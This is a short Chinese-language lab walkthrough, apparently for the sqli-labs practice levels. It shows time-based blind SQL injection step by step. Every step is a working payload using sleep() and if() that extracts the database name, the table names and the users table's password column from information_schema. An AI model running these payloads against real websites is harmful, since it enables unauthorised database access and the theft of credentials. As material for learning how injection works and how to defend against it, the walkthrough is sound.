第五关、第八关以及第九关、第十关都是使用盲注,除了第五关说的双注入外,也可使用时间注入法
(1)无论输入啥,都回显相同
(2)
?id=1' and sleep(3) --+
发现有明显延迟,说明可以使用时间注入,
?id=1' and if(length(database())=8 , sleep(5), 1) --+
从1尝试到8发现有明显延迟,说明数据库名为八位
(3)同样的爆库名
?id=1' and if(left(database(),1)='s' , sleep(5), 1) --+
?id=1' and if(left(database(),8)='security' , sleep(5), 1) --+
继续尝试可得库名:security
(4)爆表名
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(5), 1) --+
改变Limit的第一个参数可以得到所有表名。
(5)爆字段
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 1,1),8)='password', sleep(5), 1) --+
改变Limit的第一个参数可以得到user表中得所有字段。